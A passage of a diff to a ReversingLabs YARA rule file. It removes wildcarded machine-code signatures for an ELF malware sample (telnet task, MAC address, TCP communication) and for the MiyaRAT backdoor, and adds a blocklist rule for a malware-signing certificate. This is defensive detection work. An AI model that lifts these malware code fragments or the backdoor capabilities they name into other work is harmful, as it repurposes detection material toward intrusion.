-            ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 48 89 05 ?? ?? ?? ?? EB ?? 48 8D 3D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 48 89 DE 48 89 C3 8B 44 24 ?? 48 8D 56 ?? 48 89 15 ?? ?? ?? ?? 89 04 B3 48
-            8B 44 24 ?? 48 8B 4C 24 ?? 48 8B 5C 24 ?? 4C 8D 0D ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 FF
-            C6 48 83 FE ?? 7D ?? 45 0F B6 2C 32 45 84 ED 74 ?? E9 ?? ?? ?? ?? 41 80 7A ?? ?? 0F
-            1F 44 00 ?? 0F 85 ?? ?? ?? ?? 41 80 7A ?? ?? 0F 85 ?? ?? ?? ?? 49 8D 72
-        }
-		$get_mac_address_p1 = {
-            4C 8D 64 24 ?? 4D 3B 66 ?? 0F 86 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 89 AC 24 ?? ??
-            ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 83 3D ?? ?? ?? ?? ?? 75 ?? E8 ?? ?? ?? ?? 48 85 FF
-            75 ?? 48 85 DB 74 ?? 48 89 5C 24 ?? 31 C9 EB ?? 31 C0 31 DB 48 8B AC 24 ?? ?? ?? ??
-            48 81 C4 ?? ?? ?? ?? C3 48 8B 05 ?? ?? ?? ?? 48 8B 1D ?? ?? ?? ?? 48 8B AC 24 ?? ??
-            ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 83 C0 ?? 48 89 D1 0F 10 00 0F 11 84 24 ?? ?? ?? ??
-            0F 10 40 ?? 0F 11 84 24 ?? ?? ?? ?? 0F 10 40 ?? 0F 11 84 24 ?? ?? ?? ?? 0F 10 40 ??
-            0F 11 84 24 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8B B4 24 ?? ?? ?? ?? 48 85 D2 75
-            ?? 31 D2 31 F6 EB ?? 48 89 4C 24 ?? 48 89 84 24 ?? ?? ?? ?? 48 89 54 24 ?? 48 89 B4
-            24 ?? ?? ?? ?? 48 8D 0C 52 48 8D 49 ?? 48 89 4C 24 ?? 48 8D 05 ?? ?? ?? ?? 31 DB 0F
-            1F 44 00 ?? E8 ?? ?? ?? ?? 48 8B 54 24 ?? 48 8B B4 24 ?? ?? ?? ?? 48 8B 7C 24 ?? 31
-            C9 31 DB EB ?? 48 89 D9 48 89 C3 31 C0 E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 89 DA 48 89
-            C6 48 8B 84 24 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 85 D2 0F 85 ?? ?? ?? ?? 48 8D 51 ?? 48
-            39 D3 0F 8F ?? ?? ?? ?? E9 ?? ?? ?? ?? 46 88 0C 10 48 FF C1 4C 89 C3 48 39 D1 7D ??
-            48 89 4C 24 ?? 44 0F B6 04 0E 44 88 44 24 ?? 0F 1F 44 00 ?? 48 85 C9 7E ?? 4C 8D 4B
-            ?? 4C 39 CF 73 ?? 48 89 5C 24 ?? 48 89 D9 4C 89 CE 48 89 C3 48 8D 05 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 4C 8D 4B ?? 48 8B 54 24 ?? 48 8B 5C 24 ?? 48 8B B4 24 ?? ?? ?? ?? 44 0F
-        }
-		$get_mac_address_p2 = {
-            B6 44 24 ?? 48 89 CF 48 8B 4C 24 ?? C6 04 18 ?? EB ?? 49 89 D9 4D 8D 51 ?? 45 89 C3
-            41 C0 E8 ?? 45 0F B6 C0 4C 8D 25 ?? ?? ?? ?? 47 0F B6 04 04 4C 39 D7 73 ?? 44 88 44
-            24 ?? 4C 89 4C 24 ?? 48 89 C3 4C 89 C9 4C 89 D6 48 8D 05 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            4C 8D 53 ?? 48 8B 54 24 ?? 48 8B B4 24 ?? ?? ?? ?? 44 0F B6 44 24 ?? 4C 8B 4C 24 ??
-            44 0F B6 5C 24 ?? 4C 8D 25 ?? ?? ?? ?? 48 89 CF 48 8B 4C 24 ?? 46 88 04 08 4D 8D 42
-            ?? 41 83 E3 ?? 47 0F B6 0C 23 4C 39 C7 0F 83 ?? ?? ?? ?? 4C 89 54 24 ?? 44 88 4C 24
-            ?? 48 89 C3 4C 89 D1 4C 89 C6 48 8D 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8D 43 ?? 48 8B
-            54 24 ?? 48 8B B4 24 ?? ?? ?? ?? 44 0F B6 4C 24 ?? 4C 8B 54 24 ?? 48 89 CF 48 8B 4C
-            24 ?? E9 ?? ?? ?? ?? 48 89 15 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 48 89 35 ?? ??
-            ?? ?? 66 90 E9 ?? ?? ?? ?? 48 8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 0F 1F 44 00
-        }
-		$network_communication_tcp_p1 = {
-            4C 8D 64 24 ?? 4D 3B 66 ?? 0F 86 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 89 AC 24 ?? ??
-            ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89
-            8C 24 ?? ?? ?? ?? 48 89 DF BB ?? ?? ?? ?? 48 89 C2 48 8D 05 ?? ?? ?? ?? 48 89 D1 E8
-            ?? ?? ?? ?? 0F 1F 84 00 ?? ?? ?? ?? 48 85 C9 0F 84 ?? ?? ?? ?? 48 89 7C 24 ?? 48 89
-            4C 24 ?? 44 0F 11 7C 24 ?? 44 0F 11 BC 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B
-            9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 4C 24 ?? 48 89 84 24 ??
-            ?? ?? ?? 48 8B 4C 24 ?? 48 85 C9 74 ?? 48 8B 49 ?? 48 89 8C 24 ?? ?? ?? ?? 48 8B 54
-            24 ?? 48 89 94 24 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 8D 4C 24 ?? BF
-            ?? ?? ?? ?? 48 89 FE E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 5C 24 ?? 90 48 8D 05 ?? ??
-            ?? ?? 66 90 E8 ?? ?? ?? ?? 48 8B 54 24 ?? 48 89 50 ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 48
-            8B 54 24 ?? 48 89 10 90 EB ?? 48 89 C7 48 8B 54 24 ?? E8 ?? ?? ?? ?? 31 DB 48 8D 0D
-            ?? ?? ?? ?? 48 89 C7 31 C0 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 89 5C
-        }
-		$network_communication_tcp_p2 = {
-            24 ?? 48 89 44 24 ?? 44 0F 11 7C 24 ?? 44 0F 11 7C 24 ?? 48 8D 0D ?? ?? ?? ?? 48 89
-            4C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 89 54 24 ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 4C 24 ?? 48 89 44 24 ?? 31 C0 48
-            8D 5C 24 ?? B9 ?? ?? ?? ?? 48 89 CF E8 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 0F 1F 40 ??
-            E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 08 48 8B 4C 24 ?? 48 89 48 ?? 83 3D ?? ??
-            ?? ?? ?? 90 75 ?? 48 8B 54 24 ?? 48 89 50 ?? 48 8B 9C 24 ?? ?? ?? ?? 48 89 58 ?? EB
-            ?? 48 8D 78 ?? 48 8B 54 24 ?? E8 ?? ?? ?? ?? 48 8D 78 ?? 48 8B 9C 24 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 5C 24 ?? 31 C9 31 FF 48 8B AC 24 ??
-            ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 89 44 24 ?? 48 89 5C 24 ?? 48 89 4C 24 ?? E8 ??
-            ?? ?? ?? 48 8B 44 24 ?? 48 8B 5C 24 ?? 48 8B 4C 24
-        }
-		$telnet_task_p1 = {
-            4C 8D A4 24 ?? ?? ?? ?? 4D 3B 66 ?? 0F 86 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 89 AC
-            24 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ?? 48 89 B4 24 ?? ?? ??
-            ?? 4C 89 54 24 ?? 4C 89 5C 24 ?? 48 89 9C 24 ?? ?? ?? ?? 4C 89 8C 24 ?? ?? ?? ?? 4C
-            89 84 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 4F ?? 48 89 F0 FF D1 48 89 C3 31
-            C0 E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 44 0F 11 BC 24
-            ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89
-            8C 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89
-            8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 1D ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ??
-            48 8D 8C 24 ?? ?? ?? ?? BF ?? ?? ?? ?? 48 89 FE E8 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ??
-            0F 1F 40 ?? E8 ?? ?? ?? ?? 48 89 44 24 ?? 90 44 0F 11 7C 24 ?? 48 8D 0D ?? ?? ?? ??
-            48 89 4C 24 ?? 48 B9 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 4C 24 ?? 90 48 C7 44 24 ?? ?? ??
-            ?? ?? C6 44 24 ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 4C 24 ?? C6 44 24 ?? ?? 48 8D 05 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 08 48 8B 8C 24 ?? ?? ?? ?? 48 89
-            48 ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 48 8B 94 24 ?? ?? ?? ?? 48 89 50 ?? 48 8B 54 24 ??
-            48 89 50 ?? EB ?? 48 8D 78 ?? 48 8B 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 78 ?? 48
-            8B 54 24 ?? E8 ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 48 8D 54 24 ?? 48 89 94 24 ??
-            ?? ?? ?? 48 8D 54 24 ?? 48 89 94 24 ?? ?? ?? ?? 48 89 C3 48 8D 8C 24 ?? ?? ?? ?? BF
-            ?? ?? ?? ?? 48 89 FE 48 8B 44 24 ?? E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 8B 94 24 ?? ??
-            ?? ?? 48 85 D2 74 ?? 48 8B 8C 24 ?? ?? ?? ?? 31 DB E9 ?? ?? ?? ?? 44 0F 11 7C 24
-        }
-		$telnet_task_p2 = {
-            48 8D 15 ?? ?? ?? ?? 48 89 54 24 ?? 48 8D 15 ?? ?? ?? ?? 48 89 54 24 ?? 48 8B 1D ??
-            ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 8D 4C 24 ?? BF ?? ?? ?? ?? 48 89 FE E8 ?? ?? ?? ??
-            48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 8B 44 24 ?? E8 ?? ?? ?? ?? 48 8B
-            44 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8D 1D ?? ?? ?? ?? 0F 1F 40 ?? E8 ?? ?? ??
-            ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 8B 74 24 ?? 48 83 C6 ?? 48 89
-            CB 48 89 F1 48 89 5C 24 ?? 48 89 4C 24 ?? 0F 10 01 0F 11 84 24 ?? ?? ?? ?? 0F 10 41
-            ?? 0F 11 84 24 ?? ?? ?? ?? 0F 10 41 ?? 0F 11 84 24 ?? ?? ?? ?? 0F 10 41 ?? 0F 11 84
-            24 ?? ?? ?? ?? 48 8B 44 24 ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 10 84 24 ?? ?? ?? ??
-            0F 11 84 24 ?? ?? ?? ?? 0F 10 84 24 ?? ?? ?? ?? 0F 11 84 24 ?? ?? ?? ?? 0F 10 84 24
-            ?? ?? ?? ?? 0F 11 84 24 ?? ?? ?? ?? 0F 10 84 24 ?? ?? ?? ?? 0F 11 84 24 ?? ?? ?? ??
-            48 8D 05 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? 0F 1F 44 00 ?? E8 ?? ?? ?? ?? 48 8D 1D
-            ?? ?? ?? ?? 48 89 C1 48 8B 44 24 ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 FF C1 48 8B 94
-            24 ?? ?? ?? ?? 48 39 CA 0F 8F ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 5C 24
-            ?? 48 89 4C 24 ?? 48 89 7C 24 ?? 48 89 74 24 ?? 4C 89 44 24 ?? 4C 89 4C 24 ?? 4C 89
-            54 24 ?? 4C 89 5C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 5C 24 ?? 48 8B 4C 24 ??
-            48 8B 7C 24 ?? 48 8B 74 24 ?? 4C 8B 44 24 ?? 4C 8B 4C 24 ?? 4C 8B 54 24
-        }
-
 	condition:
-		uint32( 0 ) == 0x464C457F and ( all of ( $get_local_address_p* ) ) and ( all of ( $get_mac_address_p* ) ) and ( all of ( $network_communication_tcp_p* ) ) and ( all of ( $telnet_task_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Divertida Creative Limited" and pe.signatures [ i ] . serial == "08:83:db:13:70:21:b5:1f:3a:2a:08:a7:6a:4b:c0:66" and 1627430400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win64_Backdoor_Miyarat : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_2B921Aaaba777B5A99507196C6F1C46C : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects MiyaRAT backdoor."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "1c5ae79a-9760-5622-909c-76bb47721ed4"
-		date = "2025-02-27"
-		modified = "2025-02-27"
+		id = "0cb5be9e-a0b7-5785-87f3-ad097d4ab479"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/backdoor/Win64.Backdoor.MiyaRAT.yara#L1-L264"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "a06deed11a7bdaa17b4cb69da1bd66ff2f2072af8cf4081f7481a51e4567135d"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10426-L10442"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "a00eb9837f7700d83862dff2077d85c68c24621d7aacf857b42587dc37976465"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "MiyaRAT"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$get_disk_information_p1 = {
-            48 8B C4 48 89 58 ?? 48 89 70 ?? 57 41 54 41 55 41 56 41 57 48 81 EC ?? ?? ?? ?? 0F
-            29 70 ?? 0F 29 78 ?? 44 0F 29 40 ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 84 24 ?? ??
-            ?? ?? 48 8B D9 48 89 8C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 45 33 ED 45 8B E5 44
-            89 6C 24 ?? FF 15 ?? ?? ?? ?? 8B F0 89 84 24 ?? ?? ?? ?? 0F 57 C0 0F 11 84 24 ?? ??
-            ?? ?? 0F 57 C9 F3 0F 7F 8C 24 ?? ?? ?? ?? 45 33 C0 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 85 F6 75 ?? 0F 57 C0 0F 11 03 4C 89 6B ?? 4C 89 6B ??
-            41 B8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8B CB E8 ?? ?? ?? ?? 90 48 8B 94 24 ?? ??
-            ?? ?? 48 83 FA ?? 0F 86 ?? ?? ?? ?? 48 FF C2 48 8B 8C 24 ?? ?? ?? ?? 48 8B C1 48 81
-            FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? B0 ?? 48 BF ?? ?? ?? ?? ?? ?? ?? ?? F2 44
-            0F 10 05 ?? ?? ?? ?? 88 44 24 ?? 3C ?? 0F 8F ?? ?? ?? ?? 0F BE D0 8D 4A ?? 0F B6 C1
-            0F A3 C6 0F 83 ?? ?? ?? ?? 0F 57 C0 0F 11 44 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7
-            44 24 ?? ?? ?? ?? ?? 0F B6 C2 88 44 24 ?? C6 44 24 ?? ?? 41 B8 ?? ?? ?? ?? 48 8D 15
-            ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 0F 57 C0 0F 11 84 24 ?? ?? ?? ?? 4C 89 AC
-            24 ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 0F 10 00 0F 11 84 24 ?? ?? ?? ?? 0F 10 48 ??
-            0F 11 8C 24 ?? ?? ?? ?? 4C 89 68 ?? 48 C7 40 ?? ?? ?? ?? ?? C6 00 ?? 41 83 CC ?? 44
-            89 64 24 ?? 48 8B 54 24 ?? 48 83 FA ?? 76 ?? 48 FF C2 48 8B 4C 24 ?? 48 8B C1 48 81
-            FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 6C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? C6 44 24
-        }
-		$get_disk_information_p2 = {
-            48 8D 8C 24 ?? ?? ?? ?? 48 83 BC 24 ?? ?? ?? ?? ?? 48 0F 47 8C 24 ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? 8B D8 48 8D 8C 24 ?? ?? ?? ?? 48 83 BC 24 ?? ?? ?? ?? ?? 48 0F 47 8C 24
-            ?? ?? ?? ?? 4C 8D 8C 24 ?? ?? ?? ?? 4C 8D 84 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ??
-            FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 83 BC 24 ?? ??
-            ?? ?? ?? 48 0F 47 8C 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ??
-            48 89 44 24 ?? 48 8D 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 84 24 ?? ?? ?? ?? 48 89
-            44 24 ?? 4C 8D 8C 24 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? FF 15 ??
-            ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 0F 57 FF 48 85 C9 78 ?? F2
-            48 0F 2A F9 EB ?? 48 8B C1 48 D1 E8 83 E1 ?? 48 0B C1 F2 48 0F 2A F8 F2 0F 58 FF F2
-            41 0F 59 F8 48 8B 8C 24 ?? ?? ?? ?? 0F 57 F6 48 85 C9 78 ?? F2 48 0F 2A F1 EB ?? 48
-            8B C1 48 D1 E8 83 E1 ?? 48 0B C1 F2 48 0F 2A F0 F2 0F 58 F6 F2 41 0F 59 F0 33 D2 41
-            B8 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 90 4C 8D 8C 24 ?? ?? ?? ?? 49 FF C9 B8 ?? ?? ?? ?? F7 E3 C1 EA ?? 0F B6 C2
-            C0 E0 ?? 8D 0C 10 02 C9 2A D9 80 C3 ?? 41 88 19 8B DA 85 D2 75 ?? 4C 8D 84 24 ?? ??
-            ?? ?? 49 8B D1 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 83 CC ?? 44 89 64 24 ?? 48
-        }
-		$get_disk_information_p3 = {
-            8B B4 24 ?? ?? ?? ?? 48 8B C7 48 2B C6 48 83 F8 ?? 0F 82 ?? ?? ?? ?? 4C 8D BC 24 ??
-            ?? ?? ?? 48 83 BC 24 ?? ?? ?? ?? ?? 4C 0F 47 BC 24 ?? ?? ?? ?? 0F 57 C0 0F 11 84 24
-            ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 4C 8D 76 ?? BF ?? ?? ??
-            ?? 48 8D 9C 24 ?? ?? ?? ?? 4C 3B F7 0F 86 ?? ?? ?? ?? 49 8B FE 48 83 CF ?? 48 B8 ??
-            ?? ?? ?? ?? ?? ?? ?? 48 3B F8 76 ?? 48 8B F8 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 83 C0
-            ?? 48 8B C8 E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 58 ?? 48 83 E3 ?? 48 89
-            43 ?? EB ?? 48 83 FF ?? B8 ?? ?? ?? ?? 48 0F 42 F8 48 8D 4F ?? 48 85 C9 75 ?? 49 8B
-            DD EB ?? 48 81 F9 ?? ?? ?? ?? 72 ?? 48 8D 41 ?? 48 3B C1 0F 86 ?? ?? ?? ?? EB ?? E8
-            ?? ?? ?? ?? 48 8B D8 48 89 9C 24 ?? ?? ?? ?? 4C 89 B4 24 ?? ?? ?? ?? 48 89 BC 24 ??
-            ?? ?? ?? 4C 8B C6 49 8B D7 48 8B CB E8 ?? ?? ?? ?? 66 C7 04 33 ?? ?? 42 C6 04 33 ??
-            41 83 CC ?? 44 89 64 24 ?? 4C 8D 8C 24 ?? ?? ?? ?? 4C 8D 84 24 ?? ?? ?? ?? 48 8D 8C
-            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 0F BA EC ?? 44 89 64 24 ?? 41 B8 ?? ?? ?? ?? 48 8D
-            15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 57 C0 0F 11 44 24 ?? 4C 89
-            6C 24 ?? 4C 89 AC 24 ?? ?? ?? ?? 0F 10 00 0F 11 44 24 ?? 0F 10 48 ?? 0F 11 4C 24 ??
-            4C 89 68 ?? 48 C7 40 ?? ?? ?? ?? ?? C6 00 ?? 41 0F BA EC ?? 44 89 64 24 ?? 48 8D 84
-            24 ?? ?? ?? ?? 49 C7 C0 ?? ?? ?? ?? 0F 1F 84 00 ?? ?? ?? ?? 49 FF C0 42 80 3C 00
-        }
-		$get_disk_information_p4 = {
-            75 ?? 48 8D 94 24 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 0F 57 C0 0F 11 84 24 ??
-            ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 0F 10 00 0F 11 84 24 ?? ??
-            ?? ?? 0F 10 48 ?? 0F 11 8C 24 ?? ?? ?? ?? 4C 89 68 ?? 48 C7 40 ?? ?? ?? ?? ?? C6 00
-            ?? 41 0F BA EC ?? 44 89 64 24 ?? 41 B8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 57 C0 0F 11 44 24 ?? 4C 89 6C 24 ?? 4C 89 6C 24 ?? 0F
-            10 00 0F 11 44 24 ?? 0F 10 48 ?? 0F 11 4C 24 ?? 4C 89 68 ?? 48 C7 40 ?? ?? ?? ?? ??
-            C6 00 ?? 41 83 CC ?? 44 89 64 24 ?? 48 8D 54 24 ?? 48 83 7C 24 ?? ?? 48 0F 47 54 24
-            ?? 4C 8B 44 24 ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B 54 24 ?? 48 83 FA
-            ?? 76 ?? 48 FF C2 48 8B 4C 24 ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48
-            8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 6C
-            24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? C6 44 24 ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 83 FA ??
-            76 ?? 48 FF C2 48 8B 8C 24 ?? ?? ?? ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2
-            ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C
-            89 AC 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 48
-            8B 94 24 ?? ?? ?? ?? 48 83 FA ?? 76 ?? 48 FF C2 48 8B 4C 24 ?? 48 8B C1 48 81 FA ??
-            ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 4C 89 6C 24 ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C6 44 24 ??
-            ?? 48 8B 94 24 ?? ?? ?? ?? 48 83 FA ?? 76 ?? 48 FF C2 48 8B 8C 24 ?? ?? ?? ?? 48 8B
-        }
-		$get_disk_information_p5 = {
-            C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8
-            ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ??
-            ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 83 FA ?? 76 ?? 48 FF
-            C2 48 8B 8C 24 ?? ?? ?? ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49
-            ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B 94 24
-            ?? ?? ?? ?? 48 83 FA ?? 76 ?? 48 FF C2 48 8B 8C 24 ?? ?? ?? ?? 48 8B C1 48 81 FA ??
-            ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 63 48 ?? 8B 84 0C ?? ?? ?? ?? 0F BA
-            F0 ?? 0F BA E8 ?? 89 84 0C ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 63 51 ?? 48 8D 8C 24 ?? ?? ?? ?? 48 03 CA 48 8B
-            50 ?? FF 10 0F 28 CE 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48
-            8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 63 48 ?? 8B 84 0C ??
-            ?? ?? ?? 0F BA F0 ?? 0F BA E8 ?? 89 84 0C ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8D 8C 24 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 63 51 ?? 48 8D 8C 24 ?? ?? ?? ??
-            48 03 CA 48 8B 50 ?? FF 10 0F 28 CF 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 15
-            ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 0F 57 C0 0F 11 44 24 ?? 4D 8B
-            CD 4C 89 6C 24 ?? 41 BA ?? ?? ?? ?? 4C 89 94 24 ?? ?? ?? ?? C6 44 24 ?? ?? 41 0F BA
